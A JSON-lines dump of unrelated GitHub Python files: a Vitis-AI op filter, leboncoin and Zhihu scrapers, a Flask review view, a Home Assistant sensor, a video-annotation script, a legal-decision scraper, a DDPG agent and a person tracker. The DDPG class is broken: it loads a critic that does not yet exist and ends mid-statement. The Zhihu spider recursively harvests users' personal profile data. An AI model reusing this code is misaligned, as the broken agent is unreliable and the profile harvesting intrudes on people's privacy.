node.in_tensors[1].node\n const_data = const_node.node_attr(const_node.op.AttrName.DATA)\n if not isinstance(const_data, list):\n const_data = [const_data]\n const_data = np.array(const_data)\n const_shape = const_data.shape\n\n if_replaceabel = (len(input_shape) <= 4 and \n len(const_shape) == 1 and\n (input_shape[-1] == const_shape[0] or\n const_shape[0] == 1))\n \n if not if_replaceabel:\n msg = f\"mul's input has the tensor dimension {input_shape} and weights has the tensor dimenstion {const_shape}.\"\n return False, msg\n return True, msg\n\ndef create_dwconv2d_from_mul(node):\n dwconv2d = TorchConv2d(NNDCT_OP.DEPTHWISE_CONV2D)\n dwconv2d.set_config('kernel_size', [1, 1])\n dwconv2d.set_config('stride', [1, 1])\n dwconv2d.set_config('padding', [0, 0])\n input_channel = node.in_tensors[0].shape[-1]\n weight_tensor = Tensor(\"weight\")\n weight_tensor.from_ndarray(np.random.randn(1, 1, 1, input_channel))\n dwconv2d.set_param(dwconv2d.ParamName.WEIGHTS, weight_tensor)\n\n return dwconv2d\n\npattern_filters = [merge_permute_to_matmul, filter_dpu_interface_reshape]\n\n\n\n\n","repo_name":"Xilinx/Vitis-AI","sub_path":"src/vai_quantizer/vai_q_pytorch/pytorch_binding/pytorch_nndct/hardware/dpu_op_filter.py","file_name":"dpu_op_filter.py","file_ext":"py","file_size_in_byte":37451,"program_lang":"python","lang":"en","doc_type":"code","stars":1266,"dataset":"github-code","pt":"78"} +{"seq_id":"69802956093","text":"from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.contrib.loader import XPathItemLoader\nfrom leboncoin.items import LeboncoinItem\n\nfrom scrapy.conf import settings\n\nimport urllib\nfrom urlparse import urlparse, parse_qs\n\n\n\nclass LeboncoinSpider(BaseSpider):\n name = \"leboncoin\"\n allowed_domains = [\"www.leboncoin.fr\"]\n #start_urls = [\n # \"http://www.leboncoin.fr/annonces/offres/nord_pas_de_calais/\"\n #]\n\n start_urls = []\n\n searches = settings['LBC_SEARCHES']\n #categories = settings['LBC_CATEGORIES']\n\n for page in range(1,settings['LBC_DEPTH']):\n for search in searches:\n #for category in categories:\n start_urls.append('http://www.leboncoin.fr/'+urllib.quote(search['category'])+'/offres/nord_pas_de_calais/?q='+urllib.quote(search['search'])+'&o='+str(page))\n\n\n def parse(self, response):\n #filename = response.url.split(\"/\")[-2]\n #open(filename, 'wb').write(response.body)\n hxs = HtmlXPathSelector(response)\n ads = hxs.select('//div[@class=\"list-lbc\"]/a')\n items = []\n def get_first(iterable, default=None):\n if iterable:\n for item in iterable:\n return item\n return default\n for ad in ads:\n item = LeboncoinItem()\n item['id'] = get_first(ad.select('@href').re('(\\d+).htm'))\n item['name'] = get_first(ad.select('div[@class=\"lbc\"]/div[@class=\"detail\"]/div[@class=\"title\"]/text()').re('^\\s*([\\w\\s]+\\w)\\s*'))\n item['photo'] = get_first(ad.select('div[@class=\"lbc\"]/div[@class=\"image\"]/div[@class=\"image-and-nb\"]/img/@src').extract())\n item['url'] = get_first(ad.select('@href').extract())\n item['price'] = get_first(ad.select('div[@class=\"lbc\"]/div[@class=\"detail\"]/div[@class=\"price\"]/text()').re('^\\s*([\\w\\s]+\\w)\\s*'))\n item['placement'] = get_first(ad.select('div[@class=\"lbc\"]/div[@class=\"detail\"]/div[@class=\"placement\"]/text()').re('^\\s*([\\w\\s]+\\w)\\s*'))\n item['category'] = response.url.split(\"/\")[-4] \n # Or use the parse_qs method\n \n query_components = parse_qs(urlparse(response.url).query)\n item['search'] = get_first(query_components[\"q\"] )\n\n #item['search'] = response.url.split(\"/\")[-4] \n items.append(item)\n return items\n","repo_name":"BaQs/lbc","sub_path":"leboncoin/leboncoin/spiders/leboncoin_spider.py","file_name":"leboncoin_spider.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41083766859","text":"from flask import abort, flash, redirect, render_template, url_for\nfrom flask_babel import gettext\nfrom flask_security import auth_required\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom project import app, db\nfrom project.access import (\n access_or_401,\n get_admin_unit_members_with_permission,\n has_access,\n)\nfrom project.forms.verification_request import VerificationRequestReviewForm\nfrom project.models import (\n AdminUnitVerificationRequest,\n AdminUnitVerificationRequestReviewStatus,\n)\nfrom project.services.admin_unit import upsert_admin_unit_relation\nfrom project.views.utils import (\n flash_errors,\n flash_message,\n handleSqlError,\n send_mails_async,\n)\n\n\n@app.route(\"/verification_request/<int:id>/review\", methods=(\"GET\", \"POST\"))\n@auth_required()\ndef admin_unit_verification_request_review(id):\n request = AdminUnitVerificationRequest.query.get_or_404(id)\n access_or_401(request.target_admin_unit, \"verification_request:verify\")\n\n if request.review_status == AdminUnitVerificationRequestReviewStatus.verified:\n flash_message(\n gettext(\"Verification request already verified\"),\n url_for(\"organizations\", path=request.source_admin_unit_id),\n gettext(\"View organization\"),\n \"danger\",\n )\n return redirect(\n url_for(\n \"manage_admin_unit_verification_requests_incoming\",\n id=request.target_admin_unit_id,\n )\n )\n\n form = VerificationRequestReviewForm(obj=request)\n\n if form.validate_on_submit():\n form.populate_obj(request)\n\n try:\n if (\n request.review_status\n == AdminUnitVerificationRequestReviewStatus.verified\n ):\n relation = upsert_admin_unit_relation(\n request.target_admin_unit_id, request.source_admin_unit_id\n )\n relation.verify = True\n\n if form.auto_verify.data:\n relation.auto_verify_event_reference_requests = True\n\n msg = gettext(\"Organization successfully verified\")\n else:\n msg = gettext(\"Verification request successfully updated\")\n\n db.session.commit()\n send_verification_request_review_status_mails(request)\n flash(msg, \"success\")\n return redirect(\n url_for(\n \"manage_admin_unit_verification_requests_incoming\",\n id=request.target_admin_unit_id,\n )\n )\n except SQLAlchemyError as e:\n db.session.rollback()\n flash(handleSqlError(e), \"danger\")\n else:\n flash_errors(form)\n\n form.auto_verify.description = gettext(\n \"If all upcoming reference requests of %(admin_unit_name)s should be verified automatically.\",\n admin_unit_name=request.source_admin_unit.name,\n )\n\n return render_template(\n \"verification_request/review.html\",\n form=form,\n request=request,\n )\n\n\n@app.route(\"/verification_request/<int:id>/review_status\")\ndef admin_unit_verification_request_review_status(id):\n request = AdminUnitVerificationRequest.query.get_or_404(id)\n\n if not has_access(\n request.target_admin_unit, \"verification_request:verify\"\n ) and not has_access(request.source_admin_unit, \"verification_request:create\"):\n abort(401)\n\n return render_template(\n \"verification_request/review_status.html\",\n verification_request=request,\n )\n\n\ndef send_verification_request_review_status_mails(request):\n # Benachrichtige alle Mitglieder der AdminUnit, die diesen Request erstellt hatte\n members = get_admin_unit_members_with_permission(\n request.source_admin_unit_id, \"verification_request:create\"\n )\n emails = list(map(lambda member: member.user.email, members))\n\n send_mails_async(\n emails,\n gettext(\"Verification request review status updated\"),\n \"verification_request_review_status_notice\",\n request=request,\n )\n","repo_name":"eventcally/eventcally","sub_path":"project/views/verification_request_review.py","file_name":"verification_request_review.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"31214990694","text":"\"\"\"Sensor platform for rtl_433.\"\"\"\nfrom __future__ import annotations\nimport logging\n\nfrom homeassistant.components.sensor import SensorEntity, SensorEntityDescription\n\nfrom .const import DOMAIN\nfrom .coordinator import Rtl433DataUpdateCoordinator\nfrom .entity import Rtl433Entity\n\n_LOGGER = logging.getLogger(__name__)\n\nENTITY_DESCRIPTIONS = (\n SensorEntityDescription(\n key=\"rtl_433_ha_http\",\n name=\"Integration Sensor\",\n icon=\"mdi:format-quote-close\",\n ),\n)\n\n\nasync def async_setup_entry(hass, entry, async_add_devices):\n \"\"\"Set up the sensor platform.\"\"\"\n coordinator = hass.data[DOMAIN][entry.entry_id]\n async_add_devices(\n Rtl433Sensor(\n coordinator=coordinator,\n entity_description=entity_description,\n )\n for entity_description in ENTITY_DESCRIPTIONS\n )\n\n\nclass Rtl433Sensor(Rtl433Entity, SensorEntity):\n \"\"\"rtl_433 Sensor class.\"\"\"\n\n def __init__(\n self,\n coordinator: Rtl433DataUpdateCoordinator,\n entity_description: SensorEntityDescription,\n ) -> None:\n \"\"\"Initialize the sensor class.\"\"\"\n super().__init__(coordinator)\n self.entity_description = entity_description\n\n @property\n def native_value(self) -> str:\n \"\"\"Return the native value of the sensor.\"\"\"\n return self.coordinator.data.get(\"body\")\n\n async def async_update(self):\n \"\"\"Update the sensor.\"\"\"\n try:\n # Fetch new data here, if needed\n # new_data = await self.coordinator.client.async_get_data()\n # Update the native value with the new data\n # self.coordinator.data = new_data\n pass\n except Exception as e:\n _LOGGER.error(f\"Error updating sensor: {e}\")\n","repo_name":"catduckgnaf/rtl_433_ha_http","sub_path":"custom_components/rtl_433/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24244256569","text":"from google.cloud import videointelligence\nfrom google.protobuf.json_format import MessageToDict\nfrom collections import Counter\nimport os\nfrom tenacity import retry, stop_after_attempt, wait_random_exponential\n\n\ndef get_annotations(json_key: str,\n str_bucket: str,\n id_video: str) -> list[dict]:\n bucket = f'gs://{str_bucket}'\n annotations = __mp4_to_annotations(json_key=json_key,\n bucket=bucket,\n id_video=id_video)\n return __annotations_to_dicts(id_video=id_video, annotations=annotations)\n\n\n@retry(stop=stop_after_attempt(1000),\n wait=wait_random_exponential(multiplier=1, max=60))\ndef __mp4_to_annotations(json_key: str,\n bucket: str,\n id_video: str) -> 'list of dict':\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = json_key\n path_mp4 = f'{bucket}/{id_video}.mp4'\n client = videointelligence.VideoIntelligenceServiceClient()\n features = ['LABEL_DETECTION']\n job = client.annotate_video(input_uri=path_mp4, features=features)\n print(MessageToDict(job.result()))\n return job.result()\n\n\ndef __annotations_to_dicts(id_video: str,\n annotations) -> dict:\n res = annotations.annotation_results[0]\n segment = res.segment_label_annotations\n c_segment = Counter([x.entity.description for x in segment])\n shot = res.shot_label_annotations\n c_shot = Counter([x.entity.description for x in shot])\n c_all = c_segment + c_shot\n c_clean = {k.replace('\\'', '').replace('\\\"', ''): v\n for k, v in c_all.items()}\n return [{'id_video': id_video,\n 'annotation': annotaion,\n 'cnt': cnt}\n for annotaion, cnt in c_clean.items()]\n\n\n\njson_key = 'd:\\\\tiktok\\\\repo\\\\viewer.json'\nstr_bucket = 'noteret_mp4'\nid_video = '7075396968930954497'\na = get_annotations(json_key=json_key, str_bucket=str_bucket, id_video=id_video)\nprint(a)\n","repo_name":"valdas1966/mypy","sub_path":"f_google/u_video_analytics.py","file_name":"u_video_analytics.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9215406672","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Selector\nimport re,json\nfrom zhihu_spider.items import ZhihuSpiderItem\n\n\nclass ZhihuSpider(scrapy.Spider):\n name = 'zhihu'\n allowed_domains = ['www.zhihu.com']\n start_urls = ['https://www.zhihu.com/people/zhang-jia-wei/following']\n\n def start_requests(self):\n for url in self.start_urls:\n yield scrapy.Request(url.format(\"zhang-jia-wei\"), callback=self.parse)\n def parse(self, response):\n\n print(\"正在获取 {} 信息\".format(response.url))\n all_data = response.body_as_unicode()\n\n select = Selector(response)\n\n # 所有知乎用户都具备的信息\n username = select.xpath(\"//span[@class='ProfileHeader-name']/text()\").extract_first() \t\t# 获取用户昵称\n sex = select.xpath(\"//div[@class='ProfileHeader-iconWrapper']/svg/@class\").extract()\n if len(sex) > 0:\n sex = 1 if str(sex[0]).find(\"male\") else 0\n else:\n sex = -1\n answers = select.xpath(\"//li[@aria-controls='Profile-answers']/a/span/text()\").extract_first()\n asks = select.xpath(\"//li[@aria-controls='Profile-asks']/a/span/text()\").extract_first()\n posts = select.xpath(\"//li[@aria-controls='Profile-posts']/a/span/text()\").extract_first()\n columns = select.xpath(\"//li[@aria-controls='Profile-columns']/a/span/text()\").extract_first()\n pins = select.xpath(\"//li[@aria-controls='Profile-pins']/a/span/text()\").extract_first()\n # 用户有可能设置了隐私,必须登录之后看到,或者记录cookie!\n follwers = select.xpath(\"//strong[@class='NumberBoard-itemValue']/@title\").extract()\n\n item = ZhihuSpiderItem()\n item[\"username\"] = username\n item[\"sex\"] = sex\n item[\"answers\"] = answers\n item[\"asks\"] = asks\n item[\"posts\"] = posts\n item[\"columns\"] = columns\n item[\"pins\"] = pins\n item[\"follwering\"] = follwers[0] if len(follwers) > 0 else 0\n item[\"follwers\"] = follwers[1] if len(follwers) > 0 else 0\n yield item\n\n # 获取第一页关注者列表\n pattern = re.compile('<script id=\\\"js-initialData\\\" type=\\\"text/json\\\">(.*?)<\\/script>')\n json_data = pattern.search(all_data).group(1)\n if json_data:\n users = json.loads(json_data)[\"initialState\"][\"entities\"][\"users\"]\n for user in users:\n yield scrapy.Request(self.start_urls[0].format(user),callback=self.parse, dont_filter=False)\n\n","repo_name":"1286211699/mmc_code","sub_path":"zhihu_spider/zhihu_spider/spiders/zhihu.py","file_name":"zhihu.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4562239424","text":"#!/usr/bin/env python\n# -*- coding: iso-8859-1 -*-\n\"\"\"Hanterar referat från Allmäna Reklamationsnämnden, www.arn.se.\n\nModulen hanterar hämtande av referat från ARNs webbplats, omvandlande\nav dessa till XHTML2/RDFa, samt transformering till browserfärdig\nXHTML1.\n\"\"\"\nimport unittest\nimport sys\nimport time\nimport re\nimport os\nimport urllib\nimport xml.etree.cElementTree as ET # Python 2.5 spoken here\nimport logging\nfrom datetime import datetime\nfrom time import time\nfrom tempfile import mktemp\nfrom pprint import pprint\nfrom collections import defaultdict\n\n# 3rd party\nimport BeautifulSoup\nfrom mechanize import Browser, LinkNotFoundError, urlopen\nfrom rdflib import Namespace\n\n# My own stuff\nimport LegalSource\nimport Util\nfrom LegalRef import LegalRef,ParseError,Link,LinkSubject\nfrom DispatchMixin import DispatchMixin\nfrom DataObjects import UnicodeStructure, CompoundStructure, \\\n MapStructure, IntStructure, DateStructure, PredicateType, \\\n serialize\n\n__version__ = (0,1)\n__author__ = u\"Staffan Malmgren <staffan@tomtebo.org>\"\n__shortdesc__ = u\"Referat från ARN\"\n__moduledir__ = \"arn\"\nlog = logging.getLogger(__moduledir__)\nif not os.path.sep in __file__:\n __scriptdir__ = os.getcwd()\nelse:\n __scriptdir__ = os.path.dirname(__file__)\n\n\nclass UnicodeSubject(PredicateType,UnicodeStructure): pass\nclass Stycke(CompoundStructure): pass\n\nclass ARNDownloader(LegalSource.Downloader):\n \n def __init__(self,config):\n super(ARNDownloader,self).__init__(config)\n\n def _get_module_dir(self):\n return __moduledir__\n \n def DownloadAll(self):\n return\n # self.__download(\"http://www.arn.se/netacgi/brs.pl?d=REFE&l=20&p=1&u=%2Freferat.htm&r=0&f=S&Sect8=PLSCRIPT&s1=%40DOCN&s2=&s3=&s4=&s5=&s6=\")\n \n def DownloadNew(self):\n return\n # self.__download(\"http://www.arn.se/netacgi/brs.pl?d=REFE&l=20&p=1&u=%2Freferat.htm&r=0&f=S&Sect8=PLSCRIPT&s1=&s2=&s3=&s4=&s5=\" + str(datetime.now().year) +\"*&s6=\")\n\n def __download(self,url):\n log.debug(\"Opening %s\" % url)\n self.browser.open(url)\n done = False\n pagecnt = 1\n while not done:\n log.info(\"Result page #%s\" % pagecnt)\n for l in (self.browser.links(text_regex=r'\\d+-\\d+')):\n basefile = l.text.replace(\"-\", \"/\")\n filename = \"%s/%s.html\" % (self.download_dir, basefile)\n if not os.path.exists(filename):\n log.info(\" Fetching %s\" % basefile)\n Util.ensureDir(filename)\n self.browser.retrieve(l.absolute_url,filename)\n self.download_log.info(basefile)\n self.browser.retrieve(l.absolute_url,filename)\n try:\n self.browser.follow_link(predicate=lambda x: x.text == '[NEXT_LIST][IMG]')\n pagecnt += 1\n except LinkNotFoundError:\n log.info(u'No next page link found, we must be done')\n done = True\n\nclass ARNParser(LegalSource.Parser):\n\n def Parse(self,basefile,files):\n parser = LegalRef(LegalRef.LAGRUM, LegalRef.EGLAGSTIFTNING, LegalRef.FORARBETEN)\n DCT = Namespace(Util.ns['dct'])\n RINFO = Namespace(Util.ns['rinfo'])\n RINFOEX = Namespace(Util.ns['rinfoex'])\n self.id = basefile\n import codecs\n # log.debug(\"Loading %s\" % files['main'][0])\n soup = Util.loadSoup(files['main'][0])\n\n # FIXME: Create a better URI pattern\n meta = {'xml:base': \"http://rinfo.lagrummet.se/publ/arn/%s\" % basefile.replace(\"/\",\"-\")}\n\n meta[u'Ärendenummer'] = UnicodeSubject(soup.first('h2').b.i.string.strip(),\n predicate=RINFOEX['arendenummer'])\n meta['dct:identifier'] = \"ARN %s\" % meta[u'Ärendenummer']\n\n rubrik = soup.first('h3').string.strip()\n if not rubrik:\n rubrik = u\"(Rubrik saknas)\"\n meta[u'Rubrik'] = UnicodeSubject(rubrik,\n predicate=DCT['description'])\n \n meta[u'Ärendemening'] = UnicodeSubject(soup.firstText(u\"Ärendemening: \").parent.parent.parent.parent.contents[1].string.strip(),\n predicate=DCT['subject'])\n meta[u'Avdelning'] = UnicodeSubject(Util.elementText(soup.firstText('Avdelning: ').parent.parent.parent.parent.contents[1]).strip(),\n predicate=RINFOEX['avdelning'])\n meta[u'Beslutsdatum'] = UnicodeSubject(Util.elementText(soup.firstText('Beslutsdatum: ').parent.parent.parent.parent.contents[1]).strip(),\n predicate=RINFO['beslutsdatum'])\n \n meta[u'Beslut'] = UnicodeSubject(soup.firstText('Beslut: ').parent.parent.parent.parent.contents[1].string.strip(),\n predicate=RINFOEX['beslutsutfall'])\n \n node = soup.firstText('Referat:').parent.parent.parent.nextSibling.nextSibling\n\n body = []\n while node and node.name == 'p':\n nodetext = Util.elementText(node).replace('\\x1a','')\n body.append(Stycke(parser.parse(nodetext, predicate=\"rinfo:lagrum\")))\n node = node.nextSibling\n\n xhtml = self.generate_xhtml(meta, body, None, __moduledir__, globals())\n return xhtml\n\nclass ARNManager(LegalSource.Manager):\n __parserClass = ARNParser\n def DownloadAll(self):\n ad = ARNDownloader(self.config)\n ad.DownloadAll()\n pass\n \n def DownloadNew(self):\n ad = ARNDownloader(self.config)\n ad.DownloadNew()\n pass\n\n def Parse(self,basefile):\n # almost generic code - could be moved to LegalSource\n start = time()\n infile = os.path.sep.join([self.baseDir, __moduledir__, 'downloaded', basefile]) + \".html\"\n outfile = os.path.sep.join([self.baseDir, __moduledir__, 'parsed', basefile]) + \".xht2\"\n \n force = (self.config[__moduledir__]['parse_force'] == 'True')\n if not force and self._outfile_is_newer([infile],outfile):\n log.debug(u\"%s: Skipping\", basefile)\n return\n\n p = self.__parserClass()\n parsed = p.Parse(basefile,{'main':[infile]})\n Util.ensureDir(outfile)\n tmpfile = mktemp()\n out = file(tmpfile, \"w\")\n out.write(parsed)\n out.close()\n #Util.indentXmlFile(tmpfile)\n Util.replace_if_different(tmpfile,outfile)\n log.info(u'%s: OK (%.3f sec)', basefile,time()-start)\n \n def _file_to_basefile(self,f):\n \"\"\"Given a full physical filename, transform it into the\n logical id-like base of that filename, or None if the filename\n shouldn't be processed.\"\"\"\n \n return \"/\".join(os.path.split(os.path.splitext(os.sep.join(os.path.normpath(f).split(os.sep)[-2:]))[0]))\n\n\n def Generate(self,basefile):\n # Generic code (except \"xsl/arn.xsl\" - could be moved to LegalSource)\n infile = self._xmlFileName(basefile)\n outfile = self._htmlFileName(basefile)\n\n force = (self.config[__moduledir__]['generate_force'] == 'True')\n if not force and self._outfile_is_newer([infile], outfile):\n log.debug(u\"%s: Överhoppad\", basefile)\n return\n Util.mkdir(os.path.dirname(outfile))\n log.info(u'Transformerar %s > %s' % (infile,outfile))\n Util.transform(\"xsl/arn.xsl\",\n infile,\n outfile,\n {},\n validate=False)\n\n def _get_module_dir(self):\n return __moduledir__\n\n def _indexpages_predicates(self):\n return [Util.ns['rinfo']+'beslutsdatum',\n Util.ns['dct']+'identifier',\n Util.ns['dct']+'description']\n \n def _build_indexpages(self, by_pred_obj, by_subj_pred):\n return # we never use these\n documents = defaultdict(lambda:defaultdict(list))\n pagetitles = {}\n pagelabels = {}\n\n date_pred = Util.ns['rinfo']+'beslutsdatum'\n id_pred = Util.ns['dct']+'identifier'\n desc_pred = Util.ns['dct']+'description'\n category = u'Efter år' # just one categeory for now\n\n # ['beslutsdatum']['2008-302-32'] = [sub1 sub2]\n\n for obj in by_pred_obj[date_pred]:\n label = category\n year = obj.split(\"-\")[0]\n for subj in by_pred_obj[date_pred][obj]:\n identifier = by_subj_pred[subj][id_pred]\n\n desc = by_subj_pred[subj][desc_pred]\n if len(desc) > 80:\n desc = desc[:80].rsplit(' ',1)[0]+'...'\n pageid = '%s' % year\n pagetitles[pageid] = u'Beslut från Allmänna Reklamationsnämnden under %s' % year\n pagelabels[pageid] = year\n documents[label][pageid].append({'uri':subj,\n 'sortkey':identifier,\n 'title':identifier,\n 'trailer':' '+desc[:80]})\n\n outfile = \"%s/%s/generated/index/index.html\" % (self.baseDir, self.moduleDir)\n if '%d' % (datetime.today().year) in pagetitles:\n pageid = '%d' % (datetime.today().year)\n else:\n # handles the situation in january, before any verdicts\n # for the new year is available\n pageid = '%d' % (datetime.today().year-1) \n title = pagetitles[pageid]\n self._render_indexpage(outfile,title,documents,pagelabels,category,pageid,docsorter=Util.numcmp)\n\n\n for category in documents.keys():\n for pageid in documents[category].keys():\n outfile = \"%s/%s/generated/index/%s.html\" % (self.baseDir, self.moduleDir, pageid)\n title = pagetitles[pageid]\n self._render_indexpage(outfile,title,documents,pagelabels,category,pageid,docsorter=Util.numcmp)\n\n\nif __name__ == \"__main__\":\n import logging.config\n logging.config.fileConfig(__scriptdir__ + '/etc/log.conf')\n ARNManager.__bases__ += (DispatchMixin,)\n mgr = ARNManager()\n mgr.Dispatch(sys.argv)\n \n \n \n","repo_name":"staffanm/legacy.lagen.nu","sub_path":"ARN.py","file_name":"ARN.py","file_ext":"py","file_size_in_byte":10286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19071101435","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom models import Actor, Critic\nfrom buffer import ReplayBuffer\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass DDPG:\n def __init__(self, sdim, adim, amax):\n # actor network and actor-target network\n self.actor = Actor(sdim, adim, amax).to(device)\n self.actor_target = Actor(sdim, adim, amax).to(device)\n self.actor_target.load_state_dict(self.critic.state_dict())\n self.actor_opt = torch.optim.Adam(self.actor.parameters(), lr=1e-4)\n\n # critic network and critic-target network\n self.critic = Critic(sdim, adim).to(device)\n self.critic_target = Critic(sdim, adim).to(device)\n self.critic_target.load_state_dict(self.critic.state_dict())\n self.critic_opt = torch.optim.Adam(self.critic.parameters(), lr=1e-4)\n \n def tensorify(self, state, action, reward, sprime, done, weights):\n # helper method to convert all objects received from buffer to tensors\n return torch.FloatTensor(state).to(device), torch.FloatTensor(action).to(device), \\\n torch.FloatTensor(reward).to(device), torch.FloatTensor(sprime).to(device), \\\n torch.FloatTensor(1 - done).to(device), torch.FloatTensor(weights).to(device)\n \n def save_checkpoint(self):\n print(\"...saving checkpoint\")\n torch.save(self.state_dict(), self.checkpoint)\n\n \n def load_checkpoint(self):\n print(\"...loading checkpoint\")\n self.load_state_dict(torch.load(self.checkpoint))\n\n\n def get_action(self, state): \n # pass the state through the network\n # this calls the __call__ method which via pytorch's\n # nn.Module is changed to call a bunch of hooks\n return self.actor(torch.FloatTensor(state.reshape(1, -1)).to(device)).cpu().data.numpy().flatten()\n \n\n def train(self, buffer, prioritized, beta, epsilon, T, batch_size=64, gamma=0.99, tau=0.005):\n for i in range(T):\n # get state, action, reward, next state from buffer to update networks\n s, a, r, sprime, done = buffer.sample(batch_size)\n weights, batch_indices = np.ones_like(r), None\n s, a, r, sprime, done, weights = self.tensorify(s, a, r, sprime, done, weights)\n \n # compute q, y, and td errors\n q_target = self.critic_target(sprime, self.actor_target(sprime)) \n y = r + (done * gamma * q_target).detach()\n q = self.critic(s, a)\n td_error = y - q\n w_td_error = torch.mul(td_error, np.sqrt(weights))\n zero_tensor = torch.zeros(w_td_error.shape)\n critic_loss = F.mse_loss(w_td_error, zero_tensor)\n\n # update critic\n self.critic_opt.zero_grad()\n critic_loss.backward()\n self.critic_opt.step()\n\n # compute actor loss\n actor_loss = -self.critic(s, self.actor(s)).mean()\n self.actor_opt.zero_grad()\n actor_loss.backward()\n self.actor_opt.step()\n\n # update target models\n fo\n \n\n\n","repo_name":"matthewstachyra/ddpg-ned2-robot","sub_path":"ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70553392253","text":"import cv2\nimport datetime\nimport imutils\nimport numpy as np\nimport os\nfrom .centroidtracker import CentroidTracker\nfrom .writer import ImageWriter\nfrom .data import Data\n\n\nclass PersonTracker:\n def __init__(self):\n self.name = 'person'\n self.proto_path = os.path.join(os.getcwd(), \"util/mobilenet/MobileNetSSD_deploy.prototxt\")\n self.model_path = os.path.join(os.getcwd(), \"util/mobilenet/MobileNetSSD_deploy.caffemodel\")\n self.write_path = os.path.join(os.getcwd(), \"imgs\", self.name)\n\n self.detector = cv2.dnn.readNetFromCaffe(prototxt=self.proto_path, caffeModel=self.model_path)\n self.data = Data().instance()\n # Only enable it if you are using OpenVino environment\n # detector.setPreferableBackend(cv2.dnn.DNN_BACKEND_INFERENCE_ENGINE)\n # detector.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n self.CLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"]\n\n self.tracker = CentroidTracker(maxDisappeared=80, maxDistance=90)\n self.objectId = 0\n self.frame_cnt = 0\n self.person_crops = []\n\n def non_max_suppression_fast(self, boxes, overlapThresh):\n try:\n if len(boxes) == 0:\n return []\n\n if boxes.dtype.kind == \"i\":\n boxes = boxes.astype(\"float\")\n\n pick = []\n\n x1 = boxes[:, 0]\n y1 = boxes[:, 1]\n x2 = boxes[:, 2]\n y2 = boxes[:, 3]\n\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n idxs = np.argsort(y2)\n\n while len(idxs) > 0:\n last = len(idxs) - 1\n i = idxs[last]\n pick.append(i)\n\n xx1 = np.maximum(x1[i], x1[idxs[:last]])\n yy1 = np.maximum(y1[i], y1[idxs[:last]])\n xx2 = np.minimum(x2[i], x2[idxs[:last]])\n yy2 = np.minimum(y2[i], y2[idxs[:last]])\n\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n\n overlap = (w * h) / area[idxs[:last]]\n\n idxs = np.delete(idxs, np.concatenate(([last],\n np.where(overlap > overlapThresh)[0])))\n\n return boxes[pick].astype(\"int\")\n except Exception as e:\n print(\"Exception occurred in non_max_suppression : {}\".format(e))\n\n def run(self, frame):\n frame = imutils.resize(frame, width=600)\n\n (H, W) = frame.shape[:2] # 450 600\n # print(frame.shape) # (450, 600, 3)\n\n # blob 이미지 생성\n # 파라미터\n # 1) image : 사용할 이미지\n # 2) scalefactor : 이미지 크기 비율 지정\n # 3) size : Convolutional Neural Network에서 사용할 이미지 크기를 지정\n # 4) mean : Mean Subtraction 값을 RGB 색상 채널별로 지정해 주는 경험치 값(최적의 값)\n blob = cv2.dnn.blobFromImage(frame, 0.007843, (W, H), 127.5)\n # print(blob)\n # [[[[-0.1137235 -0.1372525 -0.1137235 ... 0.5764605 0.5843035\n # 0.5843035 ] ....\n\n # 사람 인식\n self.detector.setInput(blob)\n person_detections = self.detector.forward() # caffe 모델이 처리한 결과값 : 4차원 배열\n # print(person_detections.shape) # (1, 1, 100, 7)\n\n rects = []\n # 사람인식 수 만큼 반복\n for i in np.arange(0, person_detections.shape[2]):\n # 사람 확률 추출\n confidence = person_detections[0, 0, i, 2]\n\n # 사람 확률이 0.4보다 큰 경우\n if confidence > 0.4:\n # 인식된 사람 index\n idx = int(person_detections[0, 0, i, 1])\n\n # print(int(person_detections[0, 0, i, 1])) # 15\n\n if self.CLASSES[idx] != \"person\":\n continue\n\n # bounding box 위치 계산\n person_box = person_detections[0, 0, i, 3:7] * np.array([W, H, W, H])\n (startX, startY, endX, endY) = person_box.astype(\"int\")\n # print(person_box)\n rects.append(person_box)\n\n boundingboxes = np.array(rects)\n boundingboxes = boundingboxes.astype(int)\n rects = self.non_max_suppression_fast(boundingboxes, 0.3)\n\n objects = self.tracker.update(rects)\n\n self.data.lock.acquire()\n certification_Id = self.data.certification_Id\n self.data.lock.release()\n\n # ---- with certification\n # if certification_Id < 0:\n # # 인증되기 전에는 검출된 모든 사람의 박스 출력\n # for (objectId, bbox) in objects.items():\n # x1, y1, x2, y2 = bbox\n # x1 = int(x1)\n # y1 = int(y1)\n # x2 = int(x2)\n # y2 = int(y2)\n #\n # text = \"ID: {}\".format(objectId)\n # cv2.putText(frame, text, (x1, y1 - 5), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 1)\n # cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 2)\n # else:\n # # 인증 